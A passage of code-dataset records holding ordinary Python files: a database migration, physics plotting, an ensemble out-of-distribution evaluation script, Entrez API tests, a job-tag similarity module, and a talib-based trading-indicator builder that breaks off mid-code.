sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('dato')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('morgenmad')\n op.drop_table('user')\n # ### end Alembic commands ###\n","repo_name":"andersbogsnes/morgenmad","sub_path":"morgenmad/migrations/versions/0d8d5a59f530_.py","file_name":"0d8d5a59f530_.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12963700492","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.figure( figsize=(16,5) )\ndata1 = np.loadtxt('data1.dat')\ndata2 = np.loadtxt('data2.dat')\n\nplt.subplot(1,2,1)\nplt.title('Método de Euler')\nplt.plot(data1[:,0],data1[:,1],label='velocidad')\nplt.plot(data1[:,0],data1[:,2],label='posición')\nplt.xlabel('t')\nplt.legend()\nplt.subplot(1,2,2)\nplt.title('Método Runge-Kutta')\nplt.plot(data2[:,0],data2[:,1],label='velocidad')\nplt.plot(data2[:,0],data2[:,2],label='posición')\nplt.xlabel('t')\nplt.legend()\nplt.savefig('punto5.png')\n\nplt.figure()\nplt.subplot(1,2,1)\nplt.plot(data1[:,1],data1[:,2], label='Euler')\nplt.legend()\nplt.xlabel('v')\nplt.ylabel('x')\nplt.subplot(1,2,2)\nplt.plot(data2[:,1],data2[:,2], label='RK4')\nplt.legend()\nplt.xlabel('v')\nplt.ylabel('x')\nplt.savefig('punto6.png')\n\ndata81 = np.loadtxt('data81.dat')\ndata82 = np.loadtxt('data82.dat')\ndata83 = np.loadtxt('data83.dat')\ndata84 = np.loadtxt('data84.dat')\n\nplt.figure()\ngam = [0.1, 0.5, 0.7, 0.9]\ndatos = [data81, data82, data83, data84]\nfor i in range(4):\n\tplt.subplot(2,2,i+1)\n\tplt.plot(datos[i][:,1],datos[i][:,2], label='$\\gamma$ ='+str(gam[i]))\n\tplt.legend()\nplt.savefig('punto8_fase.png')\nplt.figure()\nfor i in range(4):\n\tplt.subplot(2,2,i+1)\n\tplt.plot(datos[i][:,0],datos[i][:,1], label='Velocidad, $\\gamma$ ='+str(gam[i]))\n\tplt.plot(datos[i][:,0],datos[i][:,2], label='Posicion, $\\gamma$ ='+str(gam[i]))\n\tplt.legend()\nplt.savefig('punto8_XvsV.png')\n","repo_name":"metodos-computacionales-1/ejercicio-14-segunda-parte-gaboandres1","sub_path":"graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29400956146","text":"#! 
/usr/bin/env python\nimport context\nimport argparse\nimport sys\nimport os\nimport numpy as np\n\nfrom prior_networks.ensembles.ensembles import get_ensemble_predictions\nfrom prior_networks.ensembles.uncertainties import ensemble_uncertainties\nfrom prior_networks.assessment.ood_detection import eval_ood_detect\n\ncommandLineParser = argparse.ArgumentParser(description='Compute features from labels.')\ncommandLineParser.add_argument('models_parent_dir', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('model_name', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('source_path', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('output_path', type=str,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--n_models', type=int, default=10,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--show', type=bool, default=True,\n help='which orignal data is saved should be loaded')\ncommandLineParser.add_argument('--overwrite', type=bool, default=False,\n help='which orignal data is saved should be loaded')\n\n\ndef main(argv=None):\n args = commandLineParser.parse_args()\n if not os.path.isdir('CMDs'):\n os.mkdir('CMDs')\n with open('CMDs/evaluate_ensemble_ood.txt', 'a') as f:\n f.write(' '.join(sys.argv) + '\\n')\n f.write('--------------------------------\\n')\n if os.path.isdir(args.output_path) and not args.overwrite:\n print(f'Directory {args.output_path}, exists. Exiting...')\n sys.exit()\n elif os.path.isdir(args.output_path) and args.overwrite:\n os.remove(args.output_path + '/*')\n else:\n os.makedirs(args.output_path)\n\n model_dirs = [os.path.join(args.models_parent_dir,\n args.model_name + \"{}\".format(int(i))) for i in range(0, args.n_models)]\n\n in_labels, in_probs = get_ensemble_predictions(model_dirs,\n args.source_path,\n args.n_models,\n prefix='id_')\n out_labels, out_probs = get_ensemble_predictions(model_dirs,\n args.source_path,\n args.n_models,\n prefix='ood_')\n\n id_uncertainties = ensemble_uncertainties(in_probs, epsilon=1e-10)\n ood_uncertainties = ensemble_uncertainties(out_probs, epsilon=1e-10)\n\n # Save uncertainties\n for key in id_uncertainties.keys():\n np.savetxt(os.path.join(args.output_path, key + '_id.txt'), id_uncertainties[key])\n np.savetxt(os.path.join(args.output_path, key + '_ood.txt'), ood_uncertainties[key])\n\n # Compute Labels\n in_domain = np.zeros_like(in_labels)\n out_domain = np.ones_like(out_labels)\n domain_labels = np.concatenate((in_domain, out_domain), axis=0)\n\n eval_ood_detect(domain_labels=domain_labels,\n in_uncertainties=id_uncertainties,\n out_uncertainties=ood_uncertainties,\n save_path=args.output_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KaosEngineer/PriorNetworks","sub_path":"prior_networks/ensembles/run/evaluate_ensemble_ood.py","file_name":"evaluate_ensemble_ood.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"} +{"seq_id":"21645662048","text":"import os\nimport seq_exp.seq_exp as seq_exp\nimport unittest\nimport tempfile\nimport ast\n\nclass EntrezTestCase(unittest.TestCase):\n def setUp(self):\n realapp, db = seq_exp.setup_api_and_db('sqlite:///:memory:')\n self.realapp = realapp\n self.db = db\n self.db_fd, realapp.config['DATABASE'] = tempfile.mkstemp()\n realapp.config['TESTING'] = True\n 
self.app = realapp.test_client()\n seq_exp.PROJECTS = {}\n\n def tearDown(self):\n self.db.close()\n os.close(self.db_fd)\n os.unlink(self.realapp.config['DATABASE'])\n\n def literal_eval(self, rv):\n resp_str = rv.data.decode(\"utf-8\")\n return ast.literal_eval(resp_str)\n\n def test_fetch_four_human_dna(self):\n #kind of fragile since relies upon external web server\n rv = self.app.get('/entrez/nucleotide', data=dict(term='human', retmax='4'))\n resp = self.literal_eval(rv)\n self.assertEqual(4, resp['count'])\n\n def test_fetch_five_mouse_protein(self):\n #kind of fragile since relies upon external web server\n rv = self.app.get('/entrez/protein', data=dict(term='mouse', retmax='5'))\n resp = self.literal_eval(rv)\n self.assertEqual(5, resp['count'])\n","repo_name":"johnbradley/seq_exp_rest","sub_path":"seq_exp/test/test_entrez.py","file_name":"test_entrez.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19180981715","text":"from sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.externals import joblib\nimport pandas as pd\nfrom DevJobs.settings import STACK_JOBS_DATA\n\nvectorizer = None\ntags_corr = None\ndf_tags = None\nPATH_DATA = STACK_JOBS_DATA # 'data/'\ntfidf_tags = None\n\ndef _aplicar_tfidf(palavras = []):\n palavras = [_clean_tranform_str(p) for p in palavras]\n matrix_tfidf = vectorizer.transform(palavras)\n \n return pd.DataFrame(\n matrix_tfidf.todense(),\n columns=vectorizer.get_feature_names()\n )\n\ndef _tag_similar(df_tags, df_tfidf_tags, df_tfidf_analizar):\n df_tfidf = df_tfidf_tags.append(df_tfidf_analizar, ignore_index=True)\n sim_matriz = cosine_similarity(df_tfidf)\n \n sim_serie = pd.Series(sim_matriz[-1]).sort_values(ascending=False)\n\n if sim_serie.iloc[1] > 0.4:\n index_tag = df_tags.loc[sim_serie.index[1]].name\n return df_tags.columns[index_tag]\n else: return None\n\n\ndef _tags_correlacionadas(tag):\n return tags_corr[ tag ].sort_values(ascending=False)[:20]\n\ndef _clean_tranform_str(texto):\n processado = ' '.join([x for x in texto])\n processado += ' ' + ' '.join([texto[i:i+2] for i, x in enumerate(texto[:-1])])\n return processado\n\ndef obter_tags_correlacionadas(descricao):\n tfidf_analizar = _aplicar_tfidf([descricao])\n tag_similar = _tag_similar(df_tags, tfidf_tags, tfidf_analizar)\n \n if not tag_similar: return []\n \n tags_correlacionadas = _tags_correlacionadas(tag_similar)\n return tags_correlacionadas.index.tolist()\n \n \ndef _inicializa():\n global tags_corr, tfidf_tags, df_tags, vectorizer\n\n df_tags = pd.read_csv(PATH_DATA + 'jobs_tags.csv')\n df_tags = df_tags.drop(['id'],axis=1)\n\n vectorizer = joblib.load(PATH_DATA + 'vectorizer_tags.dat')\n tags_corr = df_tags.fillna(0).corr()\n tfidf_tags = _aplicar_tfidf(df_tags.columns)\n \n_inicializa() ","repo_name":"GuilhermeDomith/dev-jobs","sub_path":"DevJobs/src/StackOverflowJobs/Tags.py","file_name":"Tags.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33123746721","text":"import logging\n\nimport pandas as pd\nimport talib\nfrom finta import TA as fin\n\nlogger = logging.getLogger(__name__)\n\ndef add_indicators_and_rename(df, previous_cols, prefix, name, series):\n nn = prefix + name + '_'\n\n if series is None:\n for col in df.columns:\n if col not in previous_cols:\n logger.debug(\"Added: \" + nn 
+ col)\n df.rename(columns={col: nn + col}, inplace=True)\n\n if isinstance(series, pd.DataFrame):\n for col in series.columns:\n if col not in previous_cols:\n logger.debug(\"Added: \" + nn + col)\n df.rename(columns={col: nn + col}, inplace=True)\n\n if isinstance(series, pd.Series):\n logger.debug(\"Added: \" + prefix + name)\n df[prefix + name] = series\n\n return df\n\n\nclass IndicatorFiller():\n\n def fill(self, input_df, minimal=False, indicators=None):\n import pandas as pd\n import warnings\n\n warnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\n self.cols = input_df.columns\n MINIMAL_LENGTH = 2000\n\n def add(name, series, pre):\n add_indicators_and_rename(df, previous_cols=self.cols, prefix=pre, name=name, series=series)\n self.cols = df.columns\n\n def set_cols():\n self.cols = df.columns\n\n\n def check_indicator(name):\n if indicators is None:\n return True\n else:\n for indicator in indicators:\n if name in indicator or name == indicator:\n return True\n return False\n\n\n def check_indicator_add(name, prefix):\n nn = prefix + name\n if indicators is None:\n return True\n else:\n for indicator in indicators:\n if nn in indicator or nn == indicator:\n return True\n return False\n\n if minimal:\n df = input_df.tail(MINIMAL_LENGTH).copy().reset_index(drop=True)\n else:\n df = input_df.copy()\n\n close = df[\"close\"]\n high = df[\"high\"]\n low = df[\"low\"]\n open = df[\"open\"]\n volume = df[\"volume\"]\n prefix = \"fixed_\"\n\n # _____ _______ ____ _ _ ____\n # / _ \\ \\ / / ____| _ \\| | / \\ | _ \\\n # | | | \\ \\ / /| _| | |_) | | / _ \\ | |_) |\n # | |_| |\\ V / | |___| _ <| |___ / ___ \\| __/\n # \\___/ \\_/ |_____|_| \\_\\_____/_/ \\_\\_|\n if check_indicator(prefix + \"HT_TRENDLINE\"):\n real = talib.HT_TRENDLINE(close)\n df[prefix + \"HT_TRENDLINE\"] = real\n\n #if check_indicator(prefix + \"SAR\"):\n # real = talib.SAR(high, low, acceleration=0, maximum=0)\n # df[prefix + \"SAR\"] = real\n\n #if check_indicator(prefix + \"SAREXT\"):\n # real = talib.SAREXT(high, low, startvalue=0, offsetonreverse=0, accelerationinitlong=0, accelerationlong=0, accelerationmaxlong=0, accelerationinitshort=0, accelerationshort=0, accelerationmaxshort=0)\n # df[prefix + \"SAREXT\"] = real\n\n # ___ ____ ____ ___ _ _ _ _____ ___ ____\n # / _ \\/ ___| / ___|_ _| | | | / \\|_ _/ _ \\| _ \\\n # | | | \\___ \\| | | || | | | / _ \\ | || | | | |_) |\n # | |_| |___) | |___ | || |___| |___ / ___ \\| || |_| | _ <\n # \\___/|____/ \\____|___|_____|_____/_/ \\_\\_| \\___/|_| \\_\\\n if check_indicator(prefix + \"BOP\"):\n real = talib.BOP(open, high, low, close)\n df[prefix + \"BOP\"] = real\n\n # __ _____ _ _ _ __ __ _____\n # \\ \\ / / _ \\| | | | | | \\/ | ____|\n # \\ \\ / / | | | | | | | | |\\/| | _|\n # \\ V /| |_| | |__| |_| | | | | |___\n # \\_/ \\___/|_____\\___/|_| |_|_____|\n #if check_indicator(prefix + \"AD\"):\n # real = talib.AD(high, low, close, volume)\n # df[prefix + \"AD\"] = real\n #if check_indicator(prefix + \"OBV\"):\n # real = talib.OBV(close, volume)\n # df[prefix + \"OBV\"] = real\n\n # __ _____ _ _ _____ ___ _ ___ _______ __\n # \\ \\ / / _ \\| | / \\|_ _|_ _| | |_ _|_ _\\ \\ / /\n # \\ \\ / / | | | | / _ \\ | | | || | | | | | \\ V /\n # \\ V /| |_| | |___ / ___ \\| | | || |___ | | | | | |\n # \\_/ \\___/|_____/_/ \\_\\_| |___|_____|___| |_| |_|\n if check_indicator(prefix + \"TRANGE\"):\n real = talib.TRANGE(high, low, close)\n df[prefix + \"TRANGE\"] = real\n\n # ____ ____ ___ ____ _____\n # | _ \\| _ \\|_ _/ ___| ____|\n # | |_) | |_) || | 
| | _|\n # | __/| _ < | | |___| |___\n # |_| |_| \\_\\___\\____|_____|\n if check_indicator(prefix + \"AVGPRICE\"):\n real = talib.AVGPRICE(open, high, low, close)\n df[prefix + \"AVGPRICE\"] = real\n\n if check_indicator(prefix + \"MEDPRICE\"):\n real = talib.MEDPRICE(high, low)\n df[prefix + \"MEDPRICE\"] = real\n\n if check_indicator(prefix + \"TYPPRICE\"):\n real = talib.TYPPRICE(high, low, close)\n df[prefix + \"TYPPRICE\"] = real\n\n if check_indicator(prefix + \"WCLPRICE\"):\n real = talib.WCLPRICE(high, low, close)\n df[prefix + \"WCLPRICE\"] = real\n\n # ______ ______ _ _____\n # / ___\\ \\ / / ___| | | ____|\n # | | \\ V / | | | | _|\n # | |___ | || |___| |___| |___\n # \\____| |_| \\____|_____|_____|\n if check_indicator(prefix + \"HT_DCPERIOD\"):\n real = talib.HT_DCPERIOD(close)\n df[prefix + \"HT_DCPERIOD\"] = real\n\n if check_indicator(prefix + \"HT_DCPHASE\"):\n real = talib.HT_DCPHASE(close)\n df[prefix + \"HT_DCPHASE\"] = real\n\n inphase, quadrature = talib.HT_PHASOR(close)\n df[prefix + \"inphase\"] = inphase\n df[prefix + \"quadrature\"] = quadrature\n\n sine, leadsine = talib.HT_SINE(close)\n df[prefix + \"sine\"] = sine\n df[prefix + \"leadsine\"] = leadsine\n\n if check_indicator(prefix + \"HT_TRENDMODE\"):\n integer = talib.HT_TRENDMODE(close)\n df[prefix + \"HT_TRENDMODE\"] = integer\n\n # ____ _ _____ _____ _____ ____ _ _\n # | _ \\ / \\|_ _|_ _| ____| _ \\| \\ | |\n # | |_) / _ \\ | | | | | _| | |_) | \\| |\n # | __/ ___ \\| | | | | |___| _ <| |\\ |\n # |_| /_/ \\_\\_| |_| |_____|_| \\_\\_| \\_|\n if check_indicator(prefix + \"CDL2CROWS\"):\n integer = talib.CDL2CROWS(open, high, low, close)\n df[prefix + \"CDL2CROWS\"] = integer\n if check_indicator(prefix + \"CDL3BLACKCROWS\"):\n integer = talib.CDL3BLACKCROWS(open, high, low, close)\n df[prefix + \"CDL3BLACKCROWS\"] = integer\n if check_indicator(prefix + \"CDL3INSIDE\"):\n integer = talib.CDL3INSIDE(open, high, low, close)\n df[prefix + \"CDL3INSIDE\"] = integer\n if check_indicator(prefix + \"CDL3LINESTRIKE\"):\n integer = talib.CDL3LINESTRIKE(open, high, low, close)\n df[prefix + \"CDL3LINESTRIKE\"] = integer\n if check_indicator(prefix + \"CDL3OUTSIDE\"):\n integer = talib.CDL3OUTSIDE(open, high, low, close)\n df[prefix + \"CDL3OUTSIDE\"] = integer\n if check_indicator(prefix + \"CDL3STARSINSOUTH\"):\n integer = talib.CDL3STARSINSOUTH(open, high, low, close)\n df[prefix + \"CDL3STARSINSOUTH\"] = integer\n if check_indicator(prefix + \"CDL3WHITESOLDIERS\"):\n integer = talib.CDL3WHITESOLDIERS(open, high, low, close)\n df[prefix + \"CDL3WHITESOLDIERS\"] = integer\n if check_indicator(prefix + \"CDLABANDONEDBABY\"):\n integer = talib.CDLABANDONEDBABY(open, high, low, close, penetration=0)\n df[prefix + \"CDLABANDONEDBABY\"] = integer\n if check_indicator(prefix + \"CDLADVANCEBLOCK\"):\n integer = talib.CDLADVANCEBLOCK(open, high, low, close)\n df[prefix + \"CDLADVANCEBLOCK\"] = integer\n if check_indicator(prefix + \"CDLBELTHOLD\"):\n integer = talib.CDLBELTHOLD(open, high, low, close)\n df[prefix + \"CDLBELTHOLD\"] = integer\n if check_indicator(prefix + \"CDLBREAKAWAY\"):\n integer = talib.CDLBREAKAWAY(open, high, low, close)\n df[prefix + \"CDLBREAKAWAY\"] = integer\n if check_indicator(prefix + \"CDLCLOSINGMARUBOZU\"):\n integer = talib.CDLCLOSINGMARUBOZU(open, high, low, close)\n df[prefix + \"CDLCLOSINGMARUBOZU\"] = integer\n if check_indicator(prefix + \"CDLCONCEALBABYSWALL\"):\n integer = talib.CDLCONCEALBABYSWALL(open, high, low, close)\n df[prefix + \"CDLCONCEALBABYSWALL\"] = integer\n if 
check_indicator(prefix + \"CDLCOUNTERATTACK\"):\n integer = talib.CDLCOUNTERATTACK(open, high, low, close)\n df[prefix + \"CDLCOUNTERATTACK\"] = integer\n if check_indicator(prefix + \"CDLDARKCLOUDCOVER\"):\n integer = talib.CDLDARKCLOUDCOVER(open, high, low, close, penetration=0)\n df[prefix + \"CDLDARKCLOUDCOVER\"] = integer\n if check_indicator(prefix + \"CDLDOJI\"):\n integer = talib.CDLDOJI(open, high, low, close)\n df[prefix + \"CDLDOJI\"] = integer\n if check_indicator(prefix + \"CDLDOJISTAR\"):\n integer = talib.CDLDOJISTAR(open, high, low, close)\n df[prefix + \"CDLDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLDRAGONFLYDOJI\"):\n integer = talib.CDLDRAGONFLYDOJI(open, high, low, close)\n df[prefix + \"CDLDRAGONFLYDOJI\"] = integer\n if check_indicator(prefix + \"CDLENGULFING\"):\n integer = talib.CDLENGULFING(open, high, low, close)\n df[prefix + \"CDLENGULFING\"] = integer\n if check_indicator(prefix + \"CDLEVENINGDOJISTAR\"):\n integer = talib.CDLEVENINGDOJISTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLEVENINGDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLEVENINGSTAR\"):\n integer = talib.CDLEVENINGSTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLEVENINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLGAPSIDESIDEWHITE\"):\n integer = talib.CDLGAPSIDESIDEWHITE(open, high, low, close)\n df[prefix + \"CDLGAPSIDESIDEWHITE\"] = integer\n if check_indicator(prefix + \"CDLGRAVESTONEDOJI\"):\n integer = talib.CDLGRAVESTONEDOJI(open, high, low, close)\n df[prefix + \"CDLGRAVESTONEDOJI\"] = integer\n if check_indicator(prefix + \"CDLHAMMER\"):\n integer = talib.CDLHAMMER(open, high, low, close)\n df[prefix + \"CDLHAMMER\"] = integer\n if check_indicator(prefix + \"CDLHANGINGMAN\"):\n integer = talib.CDLHANGINGMAN(open, high, low, close)\n df[prefix + \"CDLHANGINGMAN\"] = integer\n if check_indicator(prefix + \"CDLHARAMI\"):\n integer = talib.CDLHARAMI(open, high, low, close)\n df[prefix + \"CDLHARAMI\"] = integer\n if check_indicator(prefix + \"CDLHARAMICROSS\"):\n integer = talib.CDLHARAMICROSS(open, high, low, close)\n df[prefix + \"CDLHARAMICROSS\"] = integer\n if check_indicator(prefix + \"CDLHIGHWAVE\"):\n integer = talib.CDLHIGHWAVE(open, high, low, close)\n df[prefix + \"CDLHIGHWAVE\"] = integer\n if check_indicator(prefix + \"CDLHIKKAKE\"):\n integer = talib.CDLHIKKAKE(open, high, low, close)\n df[prefix + \"CDLHIKKAKE\"] = integer\n if check_indicator(prefix + \"CDLHIKKAKEMOD\"):\n integer = talib.CDLHIKKAKEMOD(open, high, low, close)\n df[prefix + \"CDLHIKKAKEMOD\"] = integer\n if check_indicator(prefix + \"CDLHOMINGPIGEON\"):\n integer = talib.CDLHOMINGPIGEON(open, high, low, close)\n df[prefix + \"CDLHOMINGPIGEON\"] = integer\n if check_indicator(prefix + \"CDLIDENTICAL3CROWS\"):\n integer = talib.CDLIDENTICAL3CROWS(open, high, low, close)\n df[prefix + \"CDLIDENTICAL3CROWS\"] = integer\n if check_indicator(prefix + \"CDLINNECK\"):\n integer = talib.CDLINNECK(open, high, low, close)\n df[prefix + \"CDLINNECK\"] = integer\n if check_indicator(prefix + \"CDLINVERTEDHAMMER\"):\n integer = talib.CDLINVERTEDHAMMER(open, high, low, close)\n df[prefix + \"CDLINVERTEDHAMMER\"] = integer\n if check_indicator(prefix + \"CDLKICKING\"):\n integer = talib.CDLKICKING(open, high, low, close)\n df[prefix + \"CDLKICKING\"] = integer\n if check_indicator(prefix + \"CDLKICKINGBYLENGTH\"):\n integer = talib.CDLKICKINGBYLENGTH(open, high, low, close)\n df[prefix + \"CDLKICKINGBYLENGTH\"] = integer\n if check_indicator(prefix + 
\"CDLLADDERBOTTOM\"):\n integer = talib.CDLLADDERBOTTOM(open, high, low, close)\n df[prefix + \"CDLLADDERBOTTOM\"] = integer\n if check_indicator(prefix + \"CDLLONGLEGGEDDOJI\"):\n integer = talib.CDLLONGLEGGEDDOJI(open, high, low, close)\n df[prefix + \"CDLLONGLEGGEDDOJI\"] = integer\n if check_indicator(prefix + \"CDLLONGLINE\"):\n integer = talib.CDLLONGLINE(open, high, low, close)\n df[prefix + \"CDLLONGLINE\"] = integer\n if check_indicator(prefix + \"CDLMARUBOZU\"):\n integer = talib.CDLMARUBOZU(open, high, low, close)\n df[prefix + \"CDLMARUBOZU\"] = integer\n if check_indicator(prefix + \"CDLMATCHINGLOW\"):\n integer = talib.CDLMATCHINGLOW(open, high, low, close)\n df[prefix + \"CDLMATCHINGLOW\"] = integer\n if check_indicator(prefix + \"CDLMATHOLD\"):\n integer = talib.CDLMATHOLD(open, high, low, close, penetration=0)\n df[prefix + \"CDLMATHOLD\"] = integer\n if check_indicator(prefix + \"CDLMORNINGDOJISTAR\"):\n integer = talib.CDLMORNINGDOJISTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLMORNINGDOJISTAR\"] = integer\n if check_indicator(prefix + \"CDLMORNINGSTAR\"):\n integer = talib.CDLMORNINGSTAR(open, high, low, close, penetration=0)\n df[prefix + \"CDLMORNINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLONNECK\"):\n integer = talib.CDLONNECK(open, high, low, close)\n df[prefix + \"CDLONNECK\"] = integer\n if check_indicator(prefix + \"CDLPIERCING\"):\n integer = talib.CDLPIERCING(open, high, low, close)\n df[prefix + \"CDLPIERCING\"] = integer\n if check_indicator(prefix + \"CDLRICKSHAWMAN\"):\n integer = talib.CDLRICKSHAWMAN(open, high, low, close)\n df[prefix + \"CDLRICKSHAWMAN\"] = integer\n if check_indicator(prefix + \"CDLRISEFALL3METHODS\"):\n integer = talib.CDLRISEFALL3METHODS(open, high, low, close)\n df[prefix + \"CDLRISEFALL3METHODS\"] = integer\n if check_indicator(prefix + \"CDLSEPARATINGLINES\"):\n integer = talib.CDLSEPARATINGLINES(open, high, low, close)\n df[prefix + \"CDLSEPARATINGLINES\"] = integer\n if check_indicator(prefix + \"CDLSHOOTINGSTAR\"):\n integer = talib.CDLSHOOTINGSTAR(open, high, low, close)\n df[prefix + \"CDLSHOOTINGSTAR\"] = integer\n if check_indicator(prefix + \"CDLSHORTLINE\"):\n integer = talib.CDLSHORTLINE(open, high, low, close)\n df[prefix + \"CDLSHORTLINE\"] = integer\n if check_indicator(prefix + \"CDLSPINNINGTOP\"):\n integer = talib.CDLSPINNINGTOP(open, high, low, close)\n df[prefix + \"CDLSPINNINGTOP\"] = integer\n if check_indicator(prefix + \"CDLSTALLEDPATTERN\"):\n integer = talib.CDLSTALLEDPATTERN(open, high, low, close)\n df[prefix + \"CDLSTALLEDPATTERN\"] = integer\n if check_indicator(prefix + \"CDLSTICKSANDWICH\"):\n integer = talib.CDLSTICKSANDWICH(open, high, low, close)\n df[prefix + \"CDLSTICKSANDWICH\"] = integer\n if check_indicator(prefix + \"CDLTAKURI\"):\n integer = talib.CDLTAKURI(open, high, low, close)\n df[prefix + \"CDLTAKURI\"] = integer\n if check_indicator(prefix + \"CDLTASUKIGAP\"):\n integer = talib.CDLTASUKIGAP(open, high, low, close)\n df[prefix + \"CDLTASUKIGAP\"] = integer\n if check_indicator(prefix + \"CDLTHRUSTING\"):\n integer = talib.CDLTHRUSTING(open, high, low, close)\n df[prefix + \"CDLTHRUSTING\"] = integer\n if check_indicator(prefix + \"CDLTRISTAR\"):\n integer = talib.CDLTRISTAR(open, high, low, close)\n df[prefix + \"CDLTRISTAR\"] = integer\n if check_indicator(prefix + \"CDLUNIQUE3RIVER\"):\n integer = talib.CDLUNIQUE3RIVER(open, high, low, close)\n df[prefix + \"CDLUNIQUE3RIVER\"] = integer\n if check_indicator(prefix + \"CDLUPSIDEGAP2CROWS\"):\n integer = 
talib.CDLUPSIDEGAP2CROWS(open, high, low, close)\n df[prefix + \"CDLUPSIDEGAP2CROWS\"] = integer\n if check_indicator(prefix + \"CDLXSIDEGAP3METHODS\"):\n integer = talib.CDLXSIDEGAP3METHODS(open, high, low, close)\n df[prefix + \"CDLXSIDEGAP3METHODS\"] = integer\n\n # _____ ___ _ _ _____ _\n # | ___|_ _| \\ | |_ _|/ \\\n # | |_ | || \\| | | | / _ \\\n # | _| | || |\\ | | |/ ___ \\\n # |_| |___|_| \\_| |_/_/ \\_\\\n\n\n #real = fin.DYMI(df)\n #add(\"DYMI\", real, prefix)\n set_cols()\n if check_indicator_add(\"PSAR\", prefix):\n real = fin.PSAR(df)\n add(\"PSAR\", real, prefix)\n\n if check_indicator_add(\"KST\", prefix): \n tmp = fin.KST(df)\n add(\"KST\", tmp, prefix)\n\n if check_indicator_add(\"COPP\", prefix): \n real = fin.COPP(df)\n add(\"COPP\", real, prefix)\n\n if check_indicator_add(\"PIVOT\", prefix): \n tmp = fin.PIVOT(df)\n add(\"PIVOT\", tmp, prefix)\n\n if check_indicator_add(\"PIVOT_FIB\", prefix): \n tmp = fin.PIVOT_FIB(df)\n add(\"PIVOT_FIB\", tmp, prefix)\n\n if check_indicator_add(\"UO\", prefix): \n real = fin.UO(df)\n add(\"UO\", real, prefix)\n\n if check_indicator_add(\"EBBP\", prefix): \n tmp = fin.EBBP(df)\n add(\"EBBP\", tmp, prefix)\n\n # ____ _ _ ____ _____ ___ __ __\n # / ___| | | / ___|_ _/ _ \\| \\/ |\n # | | | | | \\___ \\ | || | | | |\\/| |\n # | |___| |_| |___) || || |_| | | | |\n # \\____|\\___/|____/ |_| \\___/|_| |_|\n #if check_indicator_add(\"wavepm_bands\", prefix):\n # tmp = cust.calculate_wavepm_bands(df, lookback=100, wavepm_column=\"close\", periods=None)\n # df.drop(list(df.filter(regex='wavePM')), axis=1, inplace=True)\n # tmp.drop(list(df.filter(regex='wavePM')), axis=1, inplace=True)\n # add(\"wavepm_bands\", tmp, prefix)\n\n #if check_indicator_add(\"log_returns\", prefix):\n # tmp = cust.log_returns(close)\n # add(\"log_returns\", tmp, prefix)\n #tmp = cust.sessions(df)\n # add(\"sessions\", tmp, prefix)\n #if check_indicator_add(\"pivots_daily_weekly\", prefix):\n # tmp = cust.pivots_daily_weekly(df)\n # add(\"pivots_daily_weekly\", tmp, prefix)\n\n #if check_indicator_add(\"signal_noise_ratio\", prefix):\n # tmp = cust.signal_noise_ratio(df)\n # add(\"signal_noise_ratio\", tmp, prefix)\n\n #if check_indicator_add(\"range_filter_dw\", prefix):\n # tmp = cust.range_filter_dw(df)\n # add(\"range_filter_dw\", tmp, prefix)\n\n periods = [7, 9, 14, 20, 30, 40, 50, 75, 100, 125, 150, 175, 200, 300, 400]\n periods.reverse()\n for period in periods:\n # Beim Minimal-Modus wird immer weniger genommen damits schneller geht. 
Man braucht eh nur -1.\n if minimal:\n df = df.tail(max(300, period * 4)).copy().reset_index(drop=True)\n\n logger.debug(f\"Period: {period}\")\n\n precision_check = period <= 300\n\n prefix = str(period) + \"_\"\n period02 = max(2, int(period * 0.2))\n period03 = max(2, int(period * 0.33))\n period05 = max(2, int(period * 0.5))\n period07 = max(2, int(period * 0.75))\n\n # _____ _______ ____ _ _ ____\n # / _ \\ \\ / / ____| _ \\| | / \\ | _ \\\n # | | | \\ \\ / /| _| | |_) | | / _ \\ | |_) |\n # | |_| |\\ V / | |___| _ <| |___ / ___ \\| __/\n # \\___/ \\_/ |_____|_| \\_\\_____/_/ \\_\\_|\n if check_indicator(prefix + \"upperband125\") or check_indicator(prefix + \"middleband125\") or check_indicator(prefix + \"lowerband125\"):\n upperband, middleband, lowerband = talib.BBANDS(close, timeperiod=period, nbdevup=1.25, nbdevdn=1.25, matype=0)\n df[prefix + \"upperband125\"] = upperband\n df[prefix + \"middleband125\"] = middleband\n df[prefix + \"lowerband125\"] = lowerband\n\n if check_indicator(prefix + \"upperband200\") or check_indicator(prefix + \"middleband200\") or check_indicator(prefix + \"lowerband200\"):\n upperband, middleband, lowerband = talib.BBANDS(close, timeperiod=period, nbdevup=2, nbdevdn=2, matype=0)\n df[prefix + \"upperband200\"] = upperband\n df[prefix + \"middleband200\"] = middleband\n df[prefix + \"lowerband200\"] = lowerband\n\n if check_indicator(prefix + 